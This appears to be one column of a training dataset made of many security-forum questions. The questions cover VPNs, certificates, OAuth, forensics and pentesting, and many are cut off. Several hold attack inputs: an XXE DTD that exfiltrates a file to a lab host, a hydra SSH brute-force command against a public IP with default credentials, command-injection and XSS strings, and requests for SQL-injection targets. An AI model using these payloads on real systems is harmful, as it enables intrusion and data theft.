instruction
stringlengths
24
29.9k
I am trying to stop integer overflow vulnerabilities by creating a simple wrapper around malloc(3) and related functions. The idea is that it returns a NULL pointer if the amount of required memory is too large for the size_t argument (or zero). However my implementation does not seem to be satisfying our static anal...
Somewhat of a privacy/security question here. I'm looking to get away from Google services, especially email, and I'm wondering if there's a reason not to use my real name in the email address. The enemy I'm think of is intrusive government surveillance. If I use an encrypted email service, just going by the handle an...
Email exchange is not a secure means of communication despite using SSL to connect to (all/most?) the email providers. What I am not sure though, is what is a good way to send important information via email in a secure way if the recipient is not a tech person. Would sending a link to Google Drive containing the infor...
I need to pentest a Java application through webswing. webswing allows running a java application in a web browser but how to pentest this? I didn't find any documentation about this actually. With my HTTP proxy (burp), I can see that webswing used websocket but all of the traffic is encrypted or it is just binary data...
A number of vulnerabilities were fixed in Firefox in the latest update. MSFA2021-08 describes it only as "memory issues that may be exploitable", and doesn't give any information: Mozilla developers Alexis Beingessner, Tyson Smith, Nika Layzell, and Mats Palmgren reported memory safety bugs present in Firefox 85 and F...
I am a data collection worker, and I usually have a large number of website resource collection tasks, how to hide my IP information when collecting. I do not want to be traced to my personal information by others. So how to do it?
If there is a widely accessible TOTP website (prototype: https://depperm.github.io/) that allows users to set a date and secret they can remember or a package that allows companies/developers to create their own domain/site specific tool, what possible security flaws are there beyond having information phished, key log...
I´m pentesting a clients website and found a self XSS Vulnerability in the Login Page: in case of a login error the Error Page shows the Username, so if you input <script>alert("XSS")</script> as User, it shows the alert box. However, it´s probably not that likely, that users do that by themselves. So I´m looking for a...
I live in a country that is not fully authoritarian but is increasingly illiberal. State agencies have been caught misusing spyware to target activists and dissidents on multiple occasions. Given the kind of work I do, my threat model is that while it is unlikely that I would be targeted by a Pegasus-style targeted s...
OSX El Capitan I have an offline computer running an old OSX operating system. I would like to connect that computer to the web for a brief few minutes in order to install HomeBrew and install a newer version of rsync. I will use the command line. What can I do to reduce security risks while connecting? Maybe block so...
There are 2 sets of API each hosted in 2 different organisations: my client's organisation and her partner's organisation. The servers from the 2 organisations communicate between each other through the APIs hosted in each organisations. The APIs are already using HTTPS protocol and authenticated using an API key. For ...
This doing a Spring Boot application (Rest API, JPA, etc) uses (via Rest) from a website (Angular) and a mobile app (Android). The user using the mobile app (in the future) will be able to authenticate via Facebook, Google, etc, and store in the database some information received from the social networks necessary for ...
I'm following Microsoft's example here - https://docs.microsoft.com/en-us/azure/app-service/app-service-web-configure-tls-mutual-auth#aspnet-sample When validating the certificate, they check that the Issuer and Subject are both correct before checking the thumbprint. As someone with only a shallow knowledge of certifi...
I execute the command hydra -l ubnt -p ubnt 138.255.252.193 -t 4 ssh I get the message it's successful Hydra (http://www.thc.org/thc-hydra) starting at 2021-02-22 11:32:05 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking ssh://138.255.252.193:22/ [22][ssh] host: ...
I have been writing on some code that automatically puts together differently parameterized attacks of common pen testing tools, i.e. sqlmap, nmap, patator etc. These attacks are then launched against two or three targets. I wanted to capture the traffic to generate a malicious workload that I can later use it as a tra...
If a server has LFI vulnerability, I usually try to find if ssh is open and after some research if I can't find any spilt credentials, I just bruteforce it or something. Can I use a LFI vulnerability for something else useful to exploit the system other than looking at /etc/passwd which I usually do to find usernames.
As given here: Permanently delete a record it is not fully possible to remove data completely. Then what do financial institutions do? Institutions that store authenticating delicate details? Even if those are encrypted and key deleted hard drive recovery services may recover the key. Also key may be stored in cache.
I want to know if the current visitor has already visited a specific site. The site is owned by someone else and is on a different domain. Is there a way?
To preface this question, I use Signal messaging app for voice, video and text. I understand that the content of all these messages are encrypted and no-one but the sender and recipient can see/hear this content. I should also say that I live in a country (Australia) where it is very easy for any authorities to obtai...
I am studying options to check traffic over multiple VLANs using a Snort cloud machine, since the normal Snort installation requires to get local network and local VLAN information. I thought to use physical machine though all offices (but this is not efficient). Is there a way to have a Snort app on Azure or AWS and h...
I would like to verify that the input from the user complies to the format of email address (in Java application). On the following page there is verbose regex that should properly validate the email http://emailregex.com/ (RFC 5322 Official Standard). (?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|...
I'm doing a questionnaire for PCI compliance and one of the questions (Yes / No / Not Applicable) is as follows: All custom application code changes are reviewed (either using manual or automated processes) prior to release to production or customers in order to identify any potential coding vulnerability as follows: ...
What to do when someone's pc has been hit by a ransomware which has .lezp extension and how to decrypt the files that have been compromised
Consider the following scenario. A company has several computers for each users on the same domain. They purchase an RSA certificate from a recognized authority which will be deployed with private / public key on all workstations. So all the stations have the same certificate and therefore the same public and private k...
I am having trouble understanding the concept of X509 encryption and its application to web service communication. The situation is that I (client) would like to communicate with another party (server) securely. To do this, the client obtains an X509 certificate from a trusted third-party CA (certificate authority). In...
When I join an organization or create a Gmail account, I am given an identity. What does the organization do to create my identity? Does it just create new pair of public key and private key? I tried to search the web for documents on the implementation, but couldn't find any. Edit: Example service: Microsoft Azure (Az...
I have a friend who is something of a public figure within a small sphere. She has been an object of negative attention recently in this sphere and has noticed that her emails are suddenly all going directly into the Spam folders of all her recipients. This holds true even amongst recipients on different emails service...
This occurred to me when looking at the security model wireguard is using. Instead of relying on users credentials and Radius authenticating central server each user has a private key used to authenticate VPN. This is modeled after SSH PKI. But how does it work when users switch computers. In big organisation it is com...
I'm testing for privilege escalations on a Ubuntu 18.04 host, and after running sudo -l , I've discovered a couple of root NOPASSWD commands for a standard user (w/unknown password). These commands contain wild cards. Example: (root) NOPASSWD: /usr/bin/ssh * /path/to/bash/script.sh I've already attempted to inject root...
Obviously a host can modify a virtual machine in any way and has full control over it, but in practice perhaps most viruses wouldn't have the complexity to search for virtual machines and modify them. Although simple keyloggers I assume would still remain a threat.
I am looking for some java applications (other than Manage Engine) vulnerable to Blind SQL Injection attacks for Authentication Bypass. I explored exploitdb and others but didn't find anything interesting. Can anybody help me with some links of Java based applications vulnerable to Blind SQL injection attacks along wit...
Recently I noticed that every few days, at (almost) the same time, one host is querying the Domain Controller for group members using SAMR calls. I am trying to understand why its happening continuously around the same time? is there a legitimate service that are automated to do so? And how can I investigate that at th...
How to exploit a program that has this line: Process.Start(user_input + "calc.exe") It's a .NET function and nothing has worked so far ("mal.exe &&", "mal.exe;", ...) Any ideas?
I get quite a few emails from valid companies and organisations in my inbox. Unfortunately most of these emails are marketing-type emails which don't have any value for me. As a result I tend to unsubscribe these emails often. My question is this - When I click unsubscribe, are my details removed from the sender's data...
I am using (have installed) this VPN on an Android Smart TV. Does Windscribe (or generally any VPN service) keep traffic logs even when they are disconnected? (Disconnected here means when the 'power-button' like button in the VPN's app is switched off). Some do keep logs when the VPN is on (connected to a server) but ...
I've been working on making an SSL server/client on C++ using Boost. To load the certificates, I use the following code for each side: server.cpp boost::asio::ssl::context ssl_context(boost::asio::ssl::context::tls); ssl_context.use_certificate_chain_file("server.crt"); ssl_context.use_private_key_file("server.key", b...
How can I trace the following MAC addresses and find out who they are or belong to: 68:B9:D3:73:00:2F 98:E2:34:05:BD:8E When checking my router, these MAC addresses were in the drop-down menu.
Anyone in the WebAppSec world is familiar with CORS as a mechanism to specify policy for when javascript is allowed to make API calls to different domains. As WebAssembly ("Wasm" - a binary web language standardized in 2019; webassembly.org, wikipedia/WebAssembly) gains popularity, I'm curious if my CORS:Javascript kno...
I'm currently scanning a network using OpenVAS / Greenbone Security Assistant installed on Kali Linux. During the scan, multiple targets have crashed. This is obviously something I want to investigate. As I'm running the "Full and fast" scan profile, 65238 NVTs are being run against each host. Unfortunately, OpenVAS do...
I am about to make a forensic image (using dc3dd from OSFClone) of two laptops and in this specific case I'd like to startup using an bootable USB stick with OSFClone and image the disk to an external disk. The laptops (HP ProBooks) in this case uses Bitlocker and has (according to the vendor specifications) an TPM 2.0...
I have the following proxychains.conf [...] [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 # <ip_prox_1> http 10.10.10.100 3128 # the loopback interface of ip_prox_1 http 127.0.0.1 3128 # <ip_prox_2> http 10.20.20.100 3128 [...] Now I call proxychains and wget on ...
Pretty straightforward question. Take the image here: https://i.imgur.com/oEdf6Rl.png Does it come with a checksum, which I can verify against after I have fully downloaded the file? This question goes for any file downloaded, and in my particular case; I do not care if the file on their end has been corrupted, but rat...
I am looking into M.2 docking stations such as the Maiwo K3016S as shown below. Is it possible to use such docking stations optionally in combination with a USB- or software write-blocker, in order to make forensic images of (Bitlocker encrypted) M.2 disks? I assume that when Bitlocker software encryption is used it s...
So far, I have reCAPTCHA setup in the "submit" button for my login form with v2 Invisible recAPTCHA. But, I have a feeling that the token that I retrieve from Google needs to be sent to my backend (along with my login data) so that the backend can validate it's a valid token before it logs me in. Is this correct? (I as...
I'm looking for the "best practice" to use in Certificate Pinning or an Alternative. Scenario:  I have a native mobile app and I have pinned the certificate so that the app can validate against my server.   Problem: The problem comes in 1 year when the certificate expires where I need to have all my app users update th...
Guys I need to install jdk 8 for my programs to work better, many programs do not support the version higher than Java 8 so I want to install Java 8 to run better, I tried to install via apt-get, but I saw that it was removed from the Kali repository because very old. Can anyone help me how to install? When I run the c...
Recently, there has been an absolute massive flood of scammers on YouTube videos related to Bitcoin. Their "trick" is to use the exact same username and profile picture as the person who uploaded the video, for example "MMCrypto", then making spammy comments/replies in the comments section, pretending to be the author ...
https://www.rfc-editor.org/rfc/rfc6637 defines ECDSA for OpenPGP and https://wiki.gnupg.org/ECC lists elliptic curve support in GnuPG since version 2.1 I have version 2.2.25 and it lists ECDSA as supported algorithm: $ gpg --version gpg (GnuPG) 2.2.25-unknown libgcrypt 1.8.7 Copyright (C) 2020 Free Software Foundation,...
If it comes to the security a hashing or encryption algorithm provides, we never know the full story. There's that part that we (respectively the public research) understand and can reason about, but we also know that there might be weaknesses we do not know about and though we can't reason about things we don't know, ...
If an email attachment such as .docx, jpeg, .xls, .pdf, etc. contains virus/malware and if I open it for preview (not opening it in Google Docs or downloading it and opening it) then can I get infected?
openssl command allows to create x509 certificates, and to add subjectDN using the -subj parameter. The parameter accepts a string of slash-delimited values in the form of: "/UPPERCASE_ABBREVIATED_KEY=VALUE/.../" i.e. "/C=IT/ST=Italy/L=Milan/O=myservice/CN=localhost" I could not find a complete list of the allowed ke...
according to https://www.rfc-editor.org/rfc/rfc8032 EdDSA uses small public keys (32 or 57 bytes) and signatures (64 or 114 bytes) for Ed25519 and Ed448, respectively; But if I sign using Ed25519 in GPG, my signature gets 144 bytes long: $ gpg --list-keys /c/Users/John/.gnupg/pubring.kbx -----------------------------...
Poking around my machine today, realised there's an unknown user listed in there: tVA2uiJ14w First I thought it could be some IT account, but then again the filenames are too funky to be business related. All of these files seems to be encoded/encrypted in some way: Extract of the diskapricotdeputy.sql /**************...
I read the audit docs on GoCryptFS website (https://nuetzlich.net/gocryptfs/threat_model/). There dragon has full information about the read write done in the gcfs partition, what does this mean and how safe is it to store GoCryptFS encrypted directory on a popular cloud provider?
In theory, authenticating with a public key should be much simpler than with a password. There is nothing to remember for the end-user, and registration can be done just by clicking a button. For all intents and purposes, this should be much more user-friendly than a traditional password-based authentication. So, why i...
If I were to configure a server that would be configured to only be accessible (HTTP) from a single IP address via a port, is it safe from unauthorized access?
I got a call from a contact on What'sApp, and when I picked up there was no audio. The person says they weren't even holding their phone when it happened, and it even took a minute for the call to show up on their phone. This seemed like some kind of security breach so I put my phone in airplane mode and disabled What'...
I talk in a security forum, and sometimes a moderator share links to sources about things he talk about, but when I hover on these links, the link is different the the source it self. It is actually a URL shortener that he himself built which associated with his website. I thought it is self profit. I asked him why he ...
I received an email to my corporate email account from an external Gmail account. The list of recipients clearly shows (an eventually successful) attempt to guess my email address based on my personal information (nothing confidential — all of it is semi-publicly available on LinkedIn), including a correct internal dom...
so I am currently following a few online courses about ethical hacking and really want to become a bug bounty hunter/penetration tester but most of them do not teach anything about stay anonymous online or staying anonymous when scanning so do ethical hacker really need to stay anonymous or not since they are granted p...
There are many ports opened by system on one Windows 8 computer: PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WorkGroup) 49152/tcp open un...
For a purpose of a security class I want to demonstrate a threat delivered via email. As a demo message I want to use an eml file that contains a banking-themed pdf attachment, requiring further actions from the user. I want to scan the eml file with a security tool indicating in particular how important it is to have ...
We have a use case wherein a mobile app that can be used by multiple users on the same device needs to authenticate the users in some offline scenarios. We were using Password grant as in OAuth2 to check the password when the user is online and storing the password's PBKDF2 hash in the device. I know this is less secur...
I have been using an rsyncd server for backups for what feels like a decade. I saw that rsyncd has no transport encryption (not even for username and password). I wonder what other security issues this software has? Here is my config (/etc/rsyncd.conf) port = 873 [backup] path = /disk/backup uid = nobody gid = users li...
I am trying to find if the following shell script is vulnerable to command injection #!/bin/sh set -x dig +noall +answer TXT $2._domainkey.$1 Now when I try something like this, sh script.sh "sparkpost.com & echo \$(whoami)" "google" (Note: the script is actually executed by a C program using posix_spawn) the follow...
Can someone explain to me the purpose of the refresh token when you're using the Client Credentials grant type with OAuth2? I'm confused because you can easily generate a new access token without one, so why bother? For example, to get an access token you typically only need: https://oauth.example.com/token?grant_type=...
I am working on an authentication server that can act as a central place to manage authentication for multiple projects, sort of like keycloak or ory kratos. While working on implementing refresh_tokens (RT) I got an idea for an alternative solution that would not rely on cookies. But first, what challenges do I see wi...
I bought a subscription to a VPN service and I am using the openvpn 2.5.1 client to connect to it. I am using Ubuntu 20.10. I now want to emulate the "kill switch" feature of most proprietary VPN client. That is, I want to block any connection that is not tunneled through the VPN. Said otherwise, if the VPN connection ...
I have attempted to decrypt traffic between two .NET applications (both on Windows platforms) using Wireshark but due to the Diffie Hellman with perfect forward secrecy, I cannot use my private key from the server to decrypt the session keys. The applications are communicating using HTTP over TLS 1.2. My only hope is t...
I am trying to run this exploit through metasploit, all done on the same Kali Linux VM. I am trying to attack from my VM to the same VM. https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md kali linux system(latest) apache: Server version: Apache/...
When reading malware-analysis posts, I see researchers talking about sophisticated state-sponsored actors. How can researchers know when something is state-sponsored from their code/C2 servers alone?
I bought a subscription to a VPN service and I set up the VPN tunnel using openvpn. In order to avoid DNS leaks, I am using the DNS servers provided by my VPN provider by manually enforcing /etc/resolv.conf. By navigating on the internet, what are all the possible ways by which my real IP address could leak? (I mean in...
I am connecting to the website of ExpressVPN that checks for WebRTC IP leaks. My IP as resulting from that website is the same IP of the VPN server I am connected to but with the last digit augmented by 1. That is, if IP address of my VPN server is A.B.C.D (e.g. 1.2.3.4) the IP as detected from that website is A.B.C.(D...
Is there any protection provided by Chrome browser against HDD dump and further forensics (with volatility-like tools)? For example, is it possible to extract google profile from Chrome folder and use it (with simple substitution) on other PC? P.S And if there is totally no protection against forensics, are there other...
I would like to know the security implications of using a bootstrap token that never expires. The reason why I'm considering doing that is that I'm using terraform and my control-plane is in a autoscaling-group, so the credentials required to join a cluster need to be known when the group is created and need to stay va...
I am finding the following link on my mobile past option once I restart or power on, any one knows what is it? e-zfas5x9ao:apa91bhrmkjzwyvopxax8_ahaqhyimnk53h1vjiba6z91wrxs34z6xz6fc_kgsuh0x6wbpsbvvol_yr2lzrkuvu6iyawl1yveebv7vprpfhxebheldcwpopkdmuz7dfdmat18tzoqjkj
Over the past week, the account credentials for my organization's Twilio account were stolen and used to send ~10,000 fraudulent SMS messages claiming to be from a major bank. The passwords have all been changed, the secrets have been rotated, and the "subaccounts" created by the scammer have been removed. I have no id...
I've been receiving a lot of email lately intended for "Daniel L...", a person with the same last name and same first initial as me. It appears this person has requested information from dozens of colleges, car rentals, business opportunities, etc; and had all the information sent to my email address. I have a short, b...
I have located an issue where the user can provide an HTML that will be rendered on a page. Unfortunately, the HTML is rendered inside an href attribute using "(quotes), making it impossible to exploit such scenarios as: <a href=https://google.com onClick=alert(1)> https://google.com </a> In order for the link to be r...
I have a CloudFormation template with parameters in my private Github repo. I'd like to make it public. I have vpc-id and subnet-id in my parameters.json. I have seen this type of data being scrubbed in tutorials etc, but I have a hard time believing it entails any security risk publishing these ids? (They are not ARN'...
i was using flvtbo youtube converter and i had to enable javascript. i saw an ad come up from "multiadblock.com" which tried to lure me into downloading a chrome extension, but of course i didn't even proceed after browsing through the google extension store i noticed that no such extension exists. flvto even redirecte...
Recently I was chatting with Bitdefender support through their support center and one weird thing I noticed was that the support person would be answering my questions right after I sent them without even taking the time to read or think about them and sometimes they would answer it before I even sent the question. So ...
I got a notice due to vandalism in Wikipedia and the perpetrator is someone with the same IP as mine. I looked up the notice and it seems that the vandalism happened last year and the person behind it lives in the same city as me but in a different location. We both seem to have the same ISP as well. I am very worried ...
I want to scrape our university's learning platform website, to let myself know via notifications when a new entry added to any lesson. But, I'm scared that they'll put robots.txt afterwards and sue me or something, I don't know. I just don't have any experience of this. I just know that I should look at robots.txt bef...
I have encountered the term "sensitive attribute" multiple times when reading up on the concept of k-anonimity -- but the texts never formally define what this term means. Take this example of a k-anonymized table from Wikipedia: +------+---------------+--------+-------------------+----------+-------------------+ | Nam...
As a security engineer, I wonder about the common approach for web app 3rd party JS dependency vulnerability management. We have a lot of apps depend on Jquery etc. In a regular vulnerability scan, old versions of JS libraries (which alot of them has XSS CVEs) reported as vulnerability. Without really reading and under...
I partially wiped my hard drive using the null-fill method through command prompt by copying a 1 Gigabyte file filled with NULL over and over until I ran out of space. After that I tried recovering files and what do you know, I got back the references and names. I look through the data of those files using a HEX editor...
I generated my self signed certificate using openssl and I chose ECC keys (prime 256v1) for root certificate but while authenticating with the server i.e. IBM cloud and my device the negotiated cipher suite was TLS-ECDHE-RSA-WITH-AES-128-GCM-SHA256 so now I'm confused because I've generated ECC keys but RSA has been us...
Company A developed a widget (Web Component) deployed on several clients/partners. Only clients/partners must be authorized to use the widget. No need to distinguish between each end users (clients' users), because only the application itself, the widget itself must be authenticated/authorized. I thought about using a ...
I have been a victim of a fraud where my solicitor's email address was used to dupe me out of a house purchase deposit. How do I determine where the emails originated from - did the crooks use emails from my inbox (hotmail) that somehow got re-forwarded back to me. Or did these email originate from my solicitor's serve...
How hmac-secret extension defined in the CTAP2 Specification is used to help implement offline authentication with an authenticator. Is there any other specification that says how to do this? From the exploration around, it looks like Microsoft is using this for offline login - https://groups.google.com/u/4/a/fidoallia...
A web vulnerability assessment was done on our web app by a third company that specializes in security, and we added common headers that we missing, and to check my headers internally before the third org could scan l used an online tool for headers when l check the headers are present and it's reporting fine. Now the ...
Is it possible to read and extract HTTP request headers via JavaScript? i.e. something like; var req = new XMLHttpRequest(); req.open(‘GET’, document.location, false); req.send(null); var headers = req.getAllResponseHeaders(); console.log(headers); But instead of reading HTTP response headers (as per snippet above), i...
My use case is the following: I want to create an app with React Native that I can deploy on both iOS and Android. The app should consume an RSS feed (https call) from the server but there is no need to have authorization in place. The output does not depends on the user. I was trying to look around for ways to have so...
On one hand "Security Operations Centre", but SOC is seemingly used in the reporting and certification domain, where does this come from? Is there another (or more) definitions of SOC in Information Security Compliance Certification, or do these terms just reference it as a way to describe practices needed to be in pla...
Looking at a typical vulnerability scan report from Nessus or Qualys most people are terrified, lost, and basically with more questions than answers. For example, how on earth am I going to deal with all these findings? From what I was taught, a vulnerability management process can be broken down into 4 steps (not ment...
My lab Kali Linux:192.168.171.134 bWApp Server: http://192.168.171.131 I want to do an exfiltration data via HTTP on this Blind XXE. I'll use the Portswigger Payload. This is the External.DTD: <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://192.168.171.134/?x=%file;'>"> %eval; %exfiltrate; Th...
I have set up a VPN client and I'm using iptables to block all connections not tunneled through the VPN. An example of the iptables rules I am using can be found here. Unfortunately with this configuration RStudio does not start up. In fact the RStudio guide says: Check firewall, proxy settings, and antimalware Althou...
Yes, I did read this answer: https://apple.stackexchange.com/questions/192365/is-it-ok-to-use-the-root-user-as-a-normal-user/192422#192422 But I still fail to understand the reasoning behind this advice, as long as we are talking about a single user home PC (for a multi-user system the advice seems obvious to me: a mal...
I am testing a lock box I own, it uses a Mifare 1k lock with default key, and I use a keyfob to unlock it. I have both a Proxmark3 and a ChameleonMini. With the Proxmark3 I am able to both clone the keyfob to a 'Chinese Magic' mifare 1k card and open the box with it, as well as emulate the card with the proxmark3 and o...